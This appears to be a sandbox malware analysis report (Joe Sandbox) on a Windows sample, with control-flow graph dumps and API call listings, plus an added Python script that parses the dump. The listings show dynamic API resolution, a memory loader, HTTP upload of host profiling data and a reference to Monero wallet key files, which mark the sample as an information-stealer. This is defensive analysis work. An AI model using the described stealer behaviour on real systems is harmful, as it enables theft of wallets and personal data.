14301 4f45c0 2 API calls 14300->14301 14302 4f43ce 14301->14302 14303 4f45c0 2 API calls 14302->14303 14304 4f43e7 14303->14304 14305 4f45c0 2 API calls 14304->14305 14306 4f4400 14305->14306 14307 4f45c0 2 API calls 14306->14307 14308 4f4419 14307->14308 14309 4f45c0 2 API calls 14308->14309 14310 4f4432 14309->14310 14311 4f45c0 2 API calls 14310->14311 14312 4f444b 14311->14312 14313 4f45c0 2 API calls 14312->14313 14314 4f4464 14313->14314 14315 4f45c0 2 API calls 14314->14315 14316 4f447d 14315->14316 14317 4f45c0 2 API calls 14316->14317 14318 4f4496 14317->14318 14319 4f45c0 2 API calls 14318->14319 14320 4f44af 14319->14320 14321 4f45c0 2 API calls 14320->14321 14322 4f44c8 14321->14322 14323 4f45c0 2 API calls 14322->14323 14324 4f44e1 14323->14324 14325 4f45c0 2 API calls 14324->14325 14326 4f44fa 
14325->14326 14327 4f45c0 2 API calls 14326->14327 14328 4f4513 14327->14328 14329 4f45c0 2 API calls 14328->14329 14330 4f452c 14329->14330 14331 4f45c0 2 API calls 14330->14331 14332 4f4545 14331->14332 14333 4f45c0 2 API calls 14332->14333 14334 4f455e 14333->14334 14335 4f45c0 2 API calls 14334->14335 14336 4f4577 14335->14336 14337 4f45c0 2 API calls 14336->14337 14338 4f4590 14337->14338 14339 4f45c0 2 API calls 14338->14339 14340 4f45a9 14339->14340 14341 509c10 14340->14341 14342 509c20 43 API calls 14341->14342 14343 50a036 8 API calls 14341->14343 14342->14343 14344 50a146 14343->14344 14345 50a0cc GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 14343->14345 14346 50a153 8 API calls 14344->14346 14347 50a216 14344->14347 14345->14344 14346->14347 14348 50a298 14347->14348 14349 50a21f GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 14347->14349 14350 50a2a5 6 API calls 14348->14350 14351 50a337 14348->14351 14349->14348 14350->14351 14352 50a344 9 API calls 14351->14352 14353 50a41f 14351->14353 14352->14353 14354 50a4a2 14353->14354 14355 50a428 GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 14353->14355 14356 50a4ab GetProcAddress GetProcAddress 14354->14356 14357 50a4dc 14354->14357 14355->14354 14356->14357 14358 50a515 14357->14358 14359 50a4e5 GetProcAddress GetProcAddress 14357->14359 14360 50a612 14358->14360 14361 50a522 10 API calls 14358->14361 14359->14358 14362 50a61b GetProcAddress GetProcAddress GetProcAddress GetProcAddress 14360->14362 14363 50a67d 14360->14363 14361->14360 14362->14363 14364 50a686 GetProcAddress 14363->14364 14365 50a69e 14363->14365 14364->14365 14366 50a6a7 GetProcAddress GetProcAddress GetProcAddress GetProcAddress 14365->14366 14367 505ca3 14365->14367 14366->14367 14368 4f1590 14367->14368 15487 4f1670 14368->15487 14371 50a7a0 lstrcpy 14372 4f15b5 14371->14372 14373 50a7a0 lstrcpy 14372->14373 14374 4f15c7 14373->14374 14375 50a7a0 
lstrcpy 14374->14375 14376 4f15d9 14375->14376 14377 50a7a0 lstrcpy 14376->14377 14378 4f1663 14377->14378 14379 505510 14378->14379 14380 505521 14379->14380 14381 50a820 2 API calls 14380->14381 14382 50552e 14381->14382 14383 50a820 2 API calls 14382->14383 14384 50553b 14383->14384 14385 50a820 2 API calls 14384->14385 14386 505548 14385->14386 14387 50a740 lstrcpy 14386->14387 14388 505555 14387->14388 14389 50a740 lstrcpy 14388->14389 14390 505562 14389->14390 14391 50a740 lstrcpy 14390->14391 14392 50556f 14391->14392 14393 50a740 lstrcpy 14392->14393 14404 50557c 14393->14404 14394 5051f0 20 API calls 14394->14404 14395 505643 StrCmpCA 14395->14404 14396 5056a0 StrCmpCA 14397 5057dc 14396->14397 14396->14404 14398 50a8a0 lstrcpy 14397->14398 14399 5057e8 14398->14399 14400 50a820 2 API calls 14399->14400 14402 5057f6 14400->14402 14401 50a820 lstrlen lstrcpy 14401->14404 14405 50a820 2 API calls 14402->14405 14403 505856 StrCmpCA 14403->14404 14406 505991 14403->14406 14404->14394 14404->14395 14404->14396 14404->14401 14404->14403 14413 505a0b StrCmpCA 14404->14413 14414 5052c0 25 API calls 14404->14414 14418 50a740 lstrcpy 14404->14418 14419 50a7a0 lstrcpy 14404->14419 14424 4f1590 lstrcpy 14404->14424 14429 50578a StrCmpCA 14404->14429 14432 50593f StrCmpCA 14404->14432 14433 50a8a0 lstrcpy 14404->14433 14408 505805 14405->14408 14407 50a8a0 lstrcpy 14406->14407 14409 50599d 14407->14409 14410 4f1670 lstrcpy 14408->14410 14411 50a820 2 API calls 14409->14411 14431 505811 14410->14431 14412 5059ab 14411->14412 14415 50a820 2 API calls 14412->14415 14416 505a16 Sleep 14413->14416 14417 505a28 14413->14417 14414->14404 14420 5059ba 14415->14420 14416->14404 14421 50a8a0 lstrcpy 14417->14421 14418->14404 14419->14404 14422 4f1670 lstrcpy 14420->14422 14423 505a34 14421->14423 14422->14431 14425 50a820 2 API calls 14423->14425 14424->14404 14426 505a43 14425->14426 14427 50a820 2 API calls 14426->14427 14428 505a52 14427->14428 14430 4f1670 lstrcpy 
Control-flow graph node/edge dump (condensed). The raw listing of numbered nodes and "a->b" edges has been reduced to the functions and API call sites it records, in address order; node ids and edges are dropped, addresses are as printed in the dump (image base 004F0000).

Network code (WinINet):
• 4f47b0: lstrlen (4f4838), InternetCrackUrlA (4f4848); the URL is split before each request
• 4f4899–4f4ecb: InternetOpenA + StrCmpCA (4f490b), 508b60 (lstrcpy, GetSystemTime), InternetConnectA (4f4aa3), HttpOpenRequestA (4f4ad3), lstrlen (4f4de7, 4f4e03), HttpSendRequestA (4f4e13), InternetReadFile (4f4e32; looped with the string helpers 50a9b0/50a8a0 until it falls through to 4f4e67), InternetCloseHandle (4f4e67, 4f4ebe, 4f4ecb); the reply then goes to 4f9ac0 (CryptStringToBinaryA, LocalAlloc, CryptStringToBinaryA, LocalFree), i.e. it is decoded with CryptStringToBinaryA
• 4f5009–4f50a0: InternetOpenUrlA, InternetReadFile loop, InternetCloseHandle ×2
• 4f5100–4f5913: 508ea0 (CryptBinaryToStringA, GetProcessHeap/RtlAllocateHeap, CryptBinaryToStringA) on the input, lstrlen (4f5192), then InternetOpenA + StrCmpCA (4f51fd), 508b60 GetSystemTime, InternetConnectA (4f5329), HttpOpenRequestA (4f5359), InternetCloseHandle (4f58b7, 4f58c4); the dump of this function stops at 4f546e
• 4f5979–4f5fc3: same sequence (InternetOpenA + StrCmpCA 4f59ee, InternetConnectA 4f5b7c, HttpOpenRequestA 4f5bac), lstrlen ×6 with GetProcessHeap/RtlAllocateHeap (4f5e81), HttpSendRequestA (4f5f2a), InternetReadFile loop (4f5f35), InternetCloseHandle (4f5f6a, 4f5fb6, 4f5fc3), then 4f9ac0 CryptStringToBinaryA on the reply

Loader (reached from 500759 via 4f98d0 -> 4f9880 -> 4f6fb0 -> 4f6d40):
• 4f6530: 508a10 (GetProcessHeap, RtlAllocateHeap), VirtualAlloc (4f668f, 4f6743)
• 4f69b0: LoadLibraryA (4f6a09), 508a10 heap allocation, GetProcAddress (4f6ba8) in a loop, 5089f0 (GetProcessHeap, HeapFree)
• 4f6d40: VirtualFree (4f6ee6), FreeLibrary (4f6f26), 5089f0 on the exit paths

String helpers and comparisons:
• 50a740 / 50a7a0 / 50a8a0: lstrcpy; 50a820: lstrlen, lstrcpy; 50a920: lstrcpy, lstrcat (50a968); 50a9b0: lstrcpy, lstrlen, lstrcpy, lstrcat (the append helper used throughout); 4f1590: lstrcpy ×4 (4f1683, 4f1695, 4f16a7)
• 500759–500a49: StrCmpCA (500799, 500865, 50099c) with lstrcpy between; 4ffb00 and 500250 (lstrcpy, 508de0, 50a920/50a8a0/50a9b0) called on the branches
• 500db7–500f17: StrCmpCA (500e27, 500e67, 500ea4) over 50a820; 500f67–501044: StrCmpCA (500fb2); 501077–501151: 50a820 loop only
• 5017c4–5019c2: StrCmpCA (5017c4) with ExitProcess (5017cf) on the failing branch, then nine further StrCmpCA sites (50185d, 50187f, 5018ad, 5018cf, 5018f1, 501913, 501932, 501951, 501970)

System profile assembled at 501a26–502699 (each value appended with 50a9b0/50a8a0), then 50265a lstrlen and 505190 -> 4f5100 to send it:
• 507500: GetVolumeInformationA (507553), GetProcessHeap, RtlAllocateHeap (5075fc), wsprintfA (507628)
• 507690 / 507720: GetProcessHeap, RtlAllocateHeap, RegOpenKeyExA, RegQueryValueExA, RegCloseKey
• 5077c0: GetCurrentProcess, IsWow64Process
• 507850, 5078e0: 3 API calls each (names not in the dump)
• 507980: GetProcessHeap, RtlAllocateHeap, GetLocalTime, wsprintfA
• 507a30: GetProcessHeap, RtlAllocateHeap, GetTimeZoneInformation, wsprintfA (507a9a)
• 507b00: GetUserDefaultLocaleName; 508d20: LocalAlloc, CharToOemW
• 507b90: GetKeyboardLayoutList, LocalAlloc, GetKeyboardLayoutList (507bcc), GetLocaleInfoA loop (507c46), LocalFree (507d1e)
• 507d80: GetSystemPowerStatus
• 50207e: GetCurrentProcessId; 509470: OpenProcess, GetModuleFileNameExA, CloseHandle (509493)
• 507e00: GetProcessHeap, RtlAllocateHeap, RegOpenKeyExA, RegQueryValueExA (507e68), RegCloseKey (507e8e)
• 507f60: GetLogicalProcessorInformationEx (507fb9), GetLastError (507fd8), 508a10/5089f0 allocate and retry, wsprintfA (508084)
• 507ed0: GetSystemInfo, wsprintfA
• 508100: GetProcessHeap, RtlAllocateHeap, GlobalMemoryStatusEx (50814d), __aulldiv, wsprintfA (50819b)
• 5087c0: GetProcessHeap, RtlAllocateHeap, wsprintfA (5087fb)
• 5081f0: string assembly with 50a9b0/50a8a0 only
• 508320 (called twice): RegOpenKeyExA (50835c), RegEnumKeyExA (5083f8), wsprintfA + RegOpenKeyExA (50843f), RegQueryValueExA (5084c1, 50856e), lstrlen (5084fa), RegCloseKey (508485 ×2, 508601, 508613)
• 508680: CreateToolhelp32Snapshot, Process32First (5086bc), Process32Next loop (5086e8), CloseHandle (50875d)
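The node/edge dump above is an export of the report's graph viewer rather than something meant to be read line by line, but it is regular enough to parse. The following Python is an added example and not part of the Joe Sandbox report: it tokenises an abridged excerpt of the dump for the function at 4f4899 (every token is copied from the listing; the string-building nodes between InternetOpenA and InternetConnectA are left out, so the two halves of the sample are not connected), lists the WinINet call sites in address order, and detects which of them sit on a cycle, which is how the InternetReadFile loop at 4f4e32/4f4e5e shows up. Function names, the WININET set and the sample excerpt are mine.

```python
import re
from collections import defaultdict, deque

EDGE = re.compile(r"^(\d+)->(\d+)$")
ADDR = re.compile(r"^[0-9a-f]{6}$")      # node addresses in the dump are 6 lowercase hex digits

# WinINet entry points worth locating in a function that talks to a server (names as they appear in the report).
WININET = {
    "InternetOpenA", "InternetOpenUrlA", "InternetCrackUrlA", "InternetConnectA",
    "HttpOpenRequestA", "HttpSendRequestA", "InternetReadFile", "InternetCloseHandle",
}

# Constructed sample: abridged excerpt of the report's node/edge dump around 4f4899.
# Nodes between InternetOpenA (14458) and InternetConnectA (14504) are omitted.
SAMPLE_DUMP = (
    "14457 50a740 lstrcpy 14456->14457 14458 4f490b InternetOpenA StrCmpCA 14457->14458 "
    "14459 4f4944 14458->14459 14460 4f4ecb InternetCloseHandle 14459->14460 15502 508b60 14459->15502 "
    "14462 4f4ee8 14460->14462 14503 4f4a8d 14504 4f4aa3 InternetConnectA 14503->14504 14504->14460 "
    "14505 4f4ad3 HttpOpenRequestA 14504->14505 14507 4f4ebe InternetCloseHandle 14505->14507 "
    "14508 4f4b28 14505->14508 14507->14460 15516 50aad0 14579->15516 14581 4f4e13 HttpSendRequestA "
    "14582 4f4e32 InternetReadFile 14581->14582 14583 4f4e67 InternetCloseHandle 14582->14583 "
    "14588 4f4e5e 14582->14588 14586 50a800 14583->14586 14585 50a9b0 4 API calls 14585->14588 "
    "14586->14507 14587 50a8a0 lstrcpy 14587->14588 14588->14582 14588->14583 14588->14585 "
    "14588->14587 15516->14581"
)


def parse_cfg_dump(text):
    """Return (nodes, succ): nodes maps id -> (addr, labels); succ maps id -> [successor ids]."""
    nodes, succ = {}, defaultdict(list)
    tokens, cur, i = text.split(), None, 0
    while i < len(tokens):
        tok = tokens[i]
        m = EDGE.match(tok)
        if m:
            succ[int(m.group(1))].append(int(m.group(2)))
        elif tok.isdigit() and i + 1 < len(tokens) and ADDR.match(tokens[i + 1]):
            cur = int(tok)                       # "<id> <addr>" opens a new node
            nodes[cur] = (tokens[i + 1], [])
            i += 1
        elif cur is not None:
            nodes[cur][1].append(tok)            # API names / annotations belong to the current node
        i += 1
    return nodes, dict(succ)


def api_sites(nodes, apis=WININET):
    """(addr, api) pairs for call sites of `apis`, sorted by address (program order inside a function)."""
    hits = [(int(addr, 16), lab) for addr, labels in nodes.values() for lab in labels if lab in apis]
    return [(f"{a:06x}", lab) for a, lab in sorted(hits)]


def reaches(succ, start, target):
    """True if `target` is reachable from `start` by following at least one edge."""
    seen, work = set(), deque(succ.get(start, []))
    while work:
        n = work.popleft()
        if n == target:
            return True
        if n not in seen:
            seen.add(n)
            work.extend(succ.get(n, []))
    return False


def looped_apis(nodes, succ, apis=WININET):
    """APIs called from nodes that lie on a cycle, i.e. are invoked repeatedly (read/append loops)."""
    return sorted({lab for nid, (_, labels) in nodes.items() if reaches(succ, nid, nid)
                   for lab in labels if lab in apis})


def sequence_from(nodes, succ, start, apis=WININET):
    """API call sites reachable from `start` (inclusive), in address order."""
    reach = {nid for nid in nodes if nid == start or reaches(succ, start, nid)}
    return api_sites({nid: nodes[nid] for nid in reach}, apis)


if __name__ == "__main__":
    nodes, succ = parse_cfg_dump(SAMPLE_DUMP)
    for addr, api in api_sites(nodes):
        print(addr, api)
    print("called in a loop:", looped_apis(nodes, succ))
```

Run against the full dump, `api_sites` with an address window selects one function's WinINet sequence, and `looped_apis` separates a single request from a read-until-empty loop.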

                                Control-flow Graph
                                Function at 00509860 (basic blocks with their successors, from the graph export):
                                • 660 509860-509874: call 509750 -> 663, 664
                                • 664 50987a-509a8e: call 509780, GetProcAddress ×21 -> 663
                                • 663 509a93-509af2: LoadLibraryA ×5 -> 665, 666
                                • 665 509af4-509b08: GetProcAddress -> 666
                                • 666 509b0d-509b14: branch -> 668, 669
                                • 669 509b16-509b41: GetProcAddress ×2 -> 668
                                • 668 509b46-509b4d: branch -> 671, 672
                                • 672 509b4f-509b63: GetProcAddress -> 671
                                • 671 509b68-509b6f: branch -> 673, 674
                                • 673 509b71-509b84: GetProcAddress -> 674
                                • 674 509b89-509b90: branch -> 675, 676
                                • 676 509b92-509bbc: GetProcAddress ×2 -> 675
                                • 675 509bc1-509bc2: end
                                Reading: block 664 resolves 21 exports from one module that is already loaded, block 663 then loads five further libraries, and each remaining GetProcAddress group (665, 669, 672, 673, 676) has a bypass edge around it, so those resolutions are conditional, consistent with a check on the LoadLibraryA result before resolving from it.
                                APIs
                                • GetProcAddress.KERNEL32(75900000,012D0840), ref: 005098A1
                                • GetProcAddress.KERNEL32(75900000,012D0690), ref: 005098BA
                                • GetProcAddress.KERNEL32(75900000,012D0558), ref: 005098D2
                                • GetProcAddress.KERNEL32(75900000,012D0678), ref: 005098EA
                                • GetProcAddress.KERNEL32(75900000,012D0570), ref: 00509903
                                • GetProcAddress.KERNEL32(75900000,012D8930), ref: 0050991B
                                • GetProcAddress.KERNEL32(75900000,012C6760), ref: 00509933
                                • GetProcAddress.KERNEL32(75900000,012C6920), ref: 0050994C
                                • GetProcAddress.KERNEL32(75900000,012D05A0), ref: 00509964
                                • GetProcAddress.KERNEL32(75900000,012D05B8), ref: 0050997C
                                • GetProcAddress.KERNEL32(75900000,012D05E8), ref: 00509995
                                • GetProcAddress.KERNEL32(75900000,012D0618), ref: 005099AD
                                • GetProcAddress.KERNEL32(75900000,012C6980), ref: 005099C5
                                • GetProcAddress.KERNEL32(75900000,012D06F0), ref: 005099DE
                                • GetProcAddress.KERNEL32(75900000,012D0630), ref: 005099F6
                                • GetProcAddress.KERNEL32(75900000,012C68E0), ref: 00509A0E
                                • GetProcAddress.KERNEL32(75900000,012D0660), ref: 00509A27
                                • GetProcAddress.KERNEL32(75900000,012D0918), ref: 00509A3F
                                • GetProcAddress.KERNEL32(75900000,012C69A0), ref: 00509A57
                                • GetProcAddress.KERNEL32(75900000,012D08B8), ref: 00509A70
                                • GetProcAddress.KERNEL32(75900000,012C6940), ref: 00509A88
                                • LoadLibraryA.KERNEL32(012D08A0,?,00506A00), ref: 00509A9A
                                • LoadLibraryA.KERNEL32(012D08D0,?,00506A00), ref: 00509AAB
                                • LoadLibraryA.KERNEL32(012D0858,?,00506A00), ref: 00509ABD
                                • LoadLibraryA.KERNEL32(012D0870,?,00506A00), ref: 00509ACF
                                • LoadLibraryA.KERNEL32(012D0888,?,00506A00), ref: 00509AE0
                                • GetProcAddress.KERNEL32(75070000,012D0900), ref: 00509B02
                                • GetProcAddress.KERNEL32(75FD0000,012D08E8), ref: 00509B23
                                • GetProcAddress.KERNEL32(75FD0000,012D8F70), ref: 00509B3B
                                • GetProcAddress.KERNEL32(75A50000,012D8F28), ref: 00509B5D
                                • GetProcAddress.KERNEL32(74E50000,012C6840), ref: 00509B7E
                                • GetProcAddress.KERNEL32(76E80000,012D89B0), ref: 00509B9F
                                • GetProcAddress.KERNEL32(76E80000,NtQueryInformationProcess), ref: 00509BB6
                                Strings
                                • NtQueryInformationProcess, xrefs: 00509BAA
                                Memory Dump Source
                                • Source File: 00000000.00000002.2143466660.00000000004F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                                • Associated: 00000000.00000002.2143446926.00000000004F0000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2143466660.00000000005A1000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2143466660.00000000005AD000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2143466660.00000000005D2000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2143466660.000000000073A000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2143625399.000000000074E000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2143625399.00000000008CC000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2143625399.00000000009B2000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2143625399.00000000009D7000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2143625399.00000000009E1000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2143625399.00000000009EF000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2143873017.00000000009F0000.00000080.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2143979579.0000000000B8D000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2143995377.0000000000B8E000.00000080.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_4f0000_file.jbxd
                                Similarity
                                • API ID: AddressProc$LibraryLoad
                                • String ID: NtQueryInformationProcess
                                • API String ID: 2238633743-2781105232

                                APIs
                                • RtlAllocateHeap.NTDLL(00000000), ref: 004F460F
                                • VirtualProtect.KERNEL32(?,00000004,00000100,00000000), ref: 004F479C
                                Strings
                                • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 004F4765, 004F4617, 004F45E8, 004F46AC, 004F4622, 004F46B7, 004F46C2, 004F4662, 004F4678, 004F46D8, 004F473F, 004F4729, 004F475A, 004F4683, 004F45C7, 004F471E, 004F474F, 004F4734, 004F4643, 004F4638, 004F4657, 004F45DD, 004F462D, 004F46CD, 004F45D2, 004F45F3, 004F4713, 004F4770, 004F466D, 004F477B
                                Memory Dump Source
                                • Source File: 00000000.00000002.2143466660.00000000004F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                                Similarity
                                • API ID: AllocateHeapProtectVirtual
                                • String ID: The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom. (the same string repeated 30 times, once per xref listed above, joined with $)
                                • API String ID: 1542196881-2218711628

                                APIs
                                  • Part of subcall function 0050A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0050A7E6
                                  • Part of subcall function 004F47B0: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 004F4839
                                  • Part of subcall function 004F47B0: InternetCrackUrlA.WININET(00000000,00000000), ref: 004F4849
                                  • Part of subcall function 0050A740: lstrcpy.KERNEL32(00510E17,00000000), ref: 0050A788
                                • InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 004F4915
                                • StrCmpCA.SHLWAPI(?,012DE250), ref: 004F493A
                                • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 004F4ABA
                                • lstrlen.KERNEL32(00000000,00000000,?,?,?,?,00510DDB,00000000,?,?,00000000,?,",00000000,?,012DE230), ref: 004F4DE8
                                • lstrlen.KERNEL32(00000000,00000000,00000000), ref: 004F4E04
                                • HttpSendRequestA.WININET(00000000,00000000,00000000), ref: 004F4E18
                                • InternetReadFile.WININET(00000000,?,000007CF,?), ref: 004F4E49
                                • InternetCloseHandle.WININET(00000000), ref: 004F4EAD
                                • InternetCloseHandle.WININET(00000000), ref: 004F4EC5
                                • HttpOpenRequestA.WININET(00000000,012DE3F0,?,012DDC38,00000000,00000000,00400100,00000000), ref: 004F4B15
                                  • Part of subcall function 0050A9B0: lstrlen.KERNEL32(?,012D8AC0,?,\Monero\wallet.keys,00510E17), ref: 0050A9C5
                                  • Part of subcall function 0050A9B0: lstrcpy.KERNEL32(00000000), ref: 0050AA04
                                  • Part of subcall function 0050A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0050AA12
                                  • Part of subcall function 0050A8A0: lstrcpy.KERNEL32(?,00510E17), ref: 0050A905
                                  • Part of subcall function 0050A920: lstrcpy.KERNEL32(00000000,?), ref: 0050A972
                                  • Part of subcall function 0050A920: lstrcat.KERNEL32(00000000), ref: 0050A982
                                • InternetCloseHandle.WININET(00000000), ref: 004F4ECF
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2143466660.00000000004F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                                Similarity
                                • API ID: Internet$lstrcpy$lstrlen$CloseHandle$HttpOpenRequestlstrcat$ConnectCrackFileReadSend
                                • String ID: "$"$------$------$------
                                • API String ID: 460715078-2180234286
                                APIs
                                • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,004F11B7), ref: 00507880
                                • RtlAllocateHeap.NTDLL(00000000), ref: 00507887
                                • GetUserNameA.ADVAPI32(00000104,00000104), ref: 0050789F
                                Memory Dump Source
                                • Source File: 00000000.00000002.2143466660.00000000004F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                                Similarity
                                • API ID: Heap$AllocateNameProcessUser
                                • String ID:
                                • API String ID: 1296208442-0
                                APIs
                                Memory Dump Source
                                • Source File: 00000000.00000002.2143466660.00000000004F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                                Similarity
                                • API ID: ExitInfoProcessSystem
                                • String ID:
                                • API String ID: 752954902-0
                                • Opcode ID: d8b367515d1f4405bb7d02e02ba48fcf5270b3036a71d2c14f91344114b6fef5
                                • Instruction ID: deb9ed60db90f4ef4af60f4f4032050a08d370bd1627417b166cc273e0a54435
                                • Opcode Fuzzy Hash: d8b367515d1f4405bb7d02e02ba48fcf5270b3036a71d2c14f91344114b6fef5
                                • Instruction Fuzzy Hash: 96D05E7490030CEBDB00DFE0D98A6EDBB78FB0C322F000555D90562340EA355491CAAA

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                (Control-flow graph of the function at 0x00509C10, rendered as an image in the original report; its basic blocks are annotated with the GetProcAddress and LoadLibraryA calls listed under APIs below.)
                                APIs
                                • GetProcAddress.KERNEL32(75900000,012C6720), ref: 00509C2D
                                • GetProcAddress.KERNEL32(75900000,012C6740), ref: 00509C45
                                • GetProcAddress.KERNEL32(75900000,012D8D18), ref: 00509C5E
                                • GetProcAddress.KERNEL32(75900000,012D8E50), ref: 00509C76
                                • GetProcAddress.KERNEL32(75900000,012DCCB8), ref: 00509C8E
                                • GetProcAddress.KERNEL32(75900000,012DCBE0), ref: 00509CA7
                                • GetProcAddress.KERNEL32(75900000,012CB298), ref: 00509CBF
                                • GetProcAddress.KERNEL32(75900000,012DCCE8), ref: 00509CD7
                                • GetProcAddress.KERNEL32(75900000,012DCBC8), ref: 00509CF0
                                • GetProcAddress.KERNEL32(75900000,012DCBF8), ref: 00509D08
                                • GetProcAddress.KERNEL32(75900000,012DCCA0), ref: 00509D20
                                • GetProcAddress.KERNEL32(75900000,012C6780), ref: 00509D39
                                • GetProcAddress.KERNEL32(75900000,012C67C0), ref: 00509D51
                                • GetProcAddress.KERNEL32(75900000,012C6800), ref: 00509D69
                                • GetProcAddress.KERNEL32(75900000,012C6820), ref: 00509D82
                                • GetProcAddress.KERNEL32(75900000,012DCD00), ref: 00509D9A
                                • GetProcAddress.KERNEL32(75900000,012DCD78), ref: 00509DB2
                                • GetProcAddress.KERNEL32(75900000,012CB0B8), ref: 00509DCB
                                • GetProcAddress.KERNEL32(75900000,012C6860), ref: 00509DE3
                                • GetProcAddress.KERNEL32(75900000,012DCD90), ref: 00509DFB
                                • GetProcAddress.KERNEL32(75900000,012DCC10), ref: 00509E14
                                • GetProcAddress.KERNEL32(75900000,012DCCD0), ref: 00509E2C
                                • GetProcAddress.KERNEL32(75900000,012DCC70), ref: 00509E44
                                • GetProcAddress.KERNEL32(75900000,012C6880), ref: 00509E5D
                                • GetProcAddress.KERNEL32(75900000,012DCB08), ref: 00509E75
                                • GetProcAddress.KERNEL32(75900000,012DCB20), ref: 00509E8D
                                • GetProcAddress.KERNEL32(75900000,012DCD60), ref: 00509EA6
                                • GetProcAddress.KERNEL32(75900000,012DCDA8), ref: 00509EBE
                                • GetProcAddress.KERNEL32(75900000,012DCB68), ref: 00509ED6
                                • GetProcAddress.KERNEL32(75900000,012DCC88), ref: 00509EEF
                                • GetProcAddress.KERNEL32(75900000,012DCC28), ref: 00509F07
                                • GetProcAddress.KERNEL32(75900000,012DCB38), ref: 00509F1F
                                • GetProcAddress.KERNEL32(75900000,012DCDC0), ref: 00509F38
                                • GetProcAddress.KERNEL32(75900000,012D9C18), ref: 00509F50
                                • GetProcAddress.KERNEL32(75900000,012DCD18), ref: 00509F68
                                • GetProcAddress.KERNEL32(75900000,012DCBB0), ref: 00509F81
                                • GetProcAddress.KERNEL32(75900000,012C68A0), ref: 00509F99
                                • GetProcAddress.KERNEL32(75900000,012DCD30), ref: 00509FB1
                                • GetProcAddress.KERNEL32(75900000,012C68C0), ref: 00509FCA
                                • GetProcAddress.KERNEL32(75900000,012DCD48), ref: 00509FE2
                                • GetProcAddress.KERNEL32(75900000,012DCDD8), ref: 00509FFA
                                • GetProcAddress.KERNEL32(75900000,012C65C0), ref: 0050A013
                                • GetProcAddress.KERNEL32(75900000,012C6620), ref: 0050A02B
                                • LoadLibraryA.KERNEL32(012DCAF0,?,00505CA3,00510AEB,?,?,?,?,?,?,?,?,?,?,00510AEA,00510AE3), ref: 0050A03D
                                • LoadLibraryA.KERNEL32(012DCC40,?,00505CA3,00510AEB,?,?,?,?,?,?,?,?,?,?,00510AEA,00510AE3), ref: 0050A04E
                                • LoadLibraryA.KERNEL32(012DCB50,?,00505CA3,00510AEB,?,?,?,?,?,?,?,?,?,?,00510AEA,00510AE3), ref: 0050A060
                                • LoadLibraryA.KERNEL32(012DCB80,?,00505CA3,00510AEB,?,?,?,?,?,?,?,?,?,?,00510AEA,00510AE3), ref: 0050A072
                                • LoadLibraryA.KERNEL32(012DCB98,?,00505CA3,00510AEB,?,?,?,?,?,?,?,?,?,?,00510AEA,00510AE3), ref: 0050A083
                                • LoadLibraryA.KERNEL32(012DCC58,?,00505CA3,00510AEB,?,?,?,?,?,?,?,?,?,?,00510AEA,00510AE3), ref: 0050A095
                                • LoadLibraryA.KERNEL32(012DCEC8,?,00505CA3,00510AEB,?,?,?,?,?,?,?,?,?,?,00510AEA,00510AE3), ref: 0050A0A7
                                • LoadLibraryA.KERNEL32(012DCDF0,?,00505CA3,00510AEB,?,?,?,?,?,?,?,?,?,?,00510AEA,00510AE3), ref: 0050A0B8
                                • GetProcAddress.KERNEL32(75FD0000,012C6500), ref: 0050A0DA
                                • GetProcAddress.KERNEL32(75FD0000,012DCEF8), ref: 0050A0F2
                                • GetProcAddress.KERNEL32(75FD0000,012D89A0), ref: 0050A10A
                                • GetProcAddress.KERNEL32(75FD0000,012DCE50), ref: 0050A123
                                • GetProcAddress.KERNEL32(75FD0000,012C6600), ref: 0050A13B
                                • GetProcAddress.KERNEL32(734B0000,012CAEB0), ref: 0050A160
                                • GetProcAddress.KERNEL32(734B0000,012C6280), ref: 0050A179
                                • GetProcAddress.KERNEL32(734B0000,012CAF00), ref: 0050A191
                                • GetProcAddress.KERNEL32(734B0000,012DCF10), ref: 0050A1A9
                                • GetProcAddress.KERNEL32(734B0000,012DCE08), ref: 0050A1C2
                                • GetProcAddress.KERNEL32(734B0000,012C62E0), ref: 0050A1DA
                                • GetProcAddress.KERNEL32(734B0000,012C6460), ref: 0050A1F2
                                • GetProcAddress.KERNEL32(734B0000,012DCF40), ref: 0050A20B
                                • GetProcAddress.KERNEL32(763B0000,012C6640), ref: 0050A22C
                                • GetProcAddress.KERNEL32(763B0000,012C6580), ref: 0050A244
